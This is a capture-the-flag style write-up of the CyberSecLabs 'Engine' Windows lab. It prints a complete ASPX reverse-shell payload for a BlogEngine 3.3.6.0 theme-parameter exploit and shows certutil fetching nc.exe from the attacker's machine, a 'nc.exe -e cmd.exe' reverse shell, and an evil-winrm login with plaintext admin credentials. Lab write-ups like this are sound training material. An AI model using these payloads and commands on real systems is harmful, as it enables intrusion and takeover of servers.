CyberSecLabs-Engine
This is my 8th write up and I will be discussing my experience with the machine “Engine” from CyberSecLabs. CyberSecLabs is a great platform for people who are new to penetration testing and want to boost their skills to take on the OSCP. This was a beginner level Windows machine and I found it pretty easy. A BlogEngine exploit caused by an unchecked theme parameter grants a reverse shell on the server running a privilege escalation script exposing Autologon admin credentials.
Step 1: Enumeration
I started off with an Nmap scan on this machine and decided there was no need for second scan type. The scan used default scripts -sC and version detection -sV.
I always like to start from top to bottom, or usually start with ports that stick out. Luckily for me, port 80 was first on the list letting me know that this thing is running a web server. Visiting http://172.31.1.16 in my browser brought me to a default IIS page.
Not much information was provided from this default page aside of it running Microsoft IIS. I decided to run a directory busting tool to discover other directories exposed on the server.
/blog was the most obvious for me which landed on this guys Alex’s blog page. I viewed the page source and found that this thing was running an exploitable version of BlogEngine along with a login button bringing me to an admin login page.
If I had a dollar for every time an admin login page used admin:admin for the username and password I would be richer than Elon Musk.. Anyway yeah this worked how shocking.
Going back to that version I found by viewing the page source I did some googling and found an exploit available for BlogEngine 3.3.6.0 which is caused by an unchecked theme parameter.
At first I was having a ton of trouble getting this exploit to work coming to find out that when I pasted it directly into vim it messed up the code. Always double check your code ladies and gentleman. Once you have it pasted into your famous text editor you need to replace the IP and port in the code with your IP and desired port or this will not work. Also, it has to be named and saved as PostView.ascx
Example:
The full exploit code:
in case you wanted to copy and paste it ;)
<%@ Control Language="C#" AutoEventWireup="true" EnableViewState="false" Inherits="BlogEngine.Core.Web.Controls.PostViewBase" %>
<%@ Import Namespace="BlogEngine.Core" %>
<script runat="server">
static System.IO.StreamWriter streamWriter;
protected override void OnLoad(EventArgs e) {
base.OnLoad(e);
using(System.Net.Sockets.TcpClient client = new System.Net.Sockets.TcpClient("10.10.10.20", 4445)) {
using(System.IO.Stream stream = client.GetStream()) {
using(System.IO.StreamReader rdr = new System.IO.StreamReader(stream)) {
streamWriter = new System.IO.StreamWriter(stream);
StringBuilder strInput = new StringBuilder();
System.Diagnostics.Process p = new System.Diagnostics.Process();
p.StartInfo.FileName = "cmd.exe";
p.StartInfo.CreateNoWindow = true;
p.StartInfo.UseShellExecute = false;
p.StartInfo.RedirectStandardOutput = true;
p.StartInfo.RedirectStandardInput = true;
p.StartInfo.RedirectStandardError = true;
p.OutputDataReceived += new System.Diagnostics.DataReceivedEventHandler(CmdOutputDataHandler);
p.Start();
p.BeginOutputReadLine();
while(true) {
strInput.Append(rdr.ReadLine());
p.StandardInput.WriteLine(strInput);
strInput.Remove(0, strInput.Length);
}
}
}
}
}
private static void CmdOutputDataHandler(object sendingProcess, System.Diagnostics.DataReceivedEventArgs outLine) {
StringBuilder strOutput = new StringBuilder();
if (!String.IsNullOrEmpty(outLine.Data)) {
try {
strOutput.Append(outLine.Data);
streamWriter.WriteLine(strOutput);
streamWriter.Flush();
} catch (Exception err) { }
}
}
</script>
<asp:PlaceHolder ID="phContent" runat="server" EnableViewState="false"></asp:PlaceHolder>Okay, so I followed these exact steps in the exploit after pasting the code into my text editor and replacing the IP and Port:
First setup a netcat listener on your machine to grab the connection.
On my Kali Machine:
sudo nc -lvp 4444- Navigate to the Content menu.
- A listing of posts should be shown on this screen. Click New to add one.
- In the toolbar located above the post body, there should be a number of icons. There should be one that looks like an open file, called File Manager. Click this icon.
- Here, simply upload the edited exploit PostView.ascx file.
- Then visit http://172.31.1.16/blog/?theme=../../App_Data/files to grab reverse connection on your netcat listener.
I got the low level shell from following those steps.
This shell sucked…. So I pushed a nc.exe file onto the exploited server into a directory that was accepting incoming files.
On my Kali Machine:
cd /usr/share/windows-binariessudo python -m SimpleHTTPServer 80
Opened another kali terminal window and setup another netcat listener on a different port this time:
sudo nc -lvp 6666On the Exploited Windows box:
cd C:\mkdir sinnercd sinnercertutil.exe -urlcache -split -f "http://youriphere:80/nc.exe"command nc.exe -e cmd.exe youriphere 6666
Now I got a better shell… woooo!
Browsed around for a while and did not find anything interesting so I pushed my favorite privilege escalation file onto the server called winPEAS.exe following the same above methods when I pushed that nc.exe file making sure to kill the python simple server and running it in the directory I am serving my winPEAS file.
After pushing it onto the server, and running winPEAS.exe the admin credentials are discovered with autologon.
I then connected back to the server with my favorite tool called evil-winrm using the credentials we found.
sudo evil-winrm -i 172.31.1.16 -u Administrator -p PzCEKhvj6gQMK7kAWell.. you can now grab both flags since you are full admin.
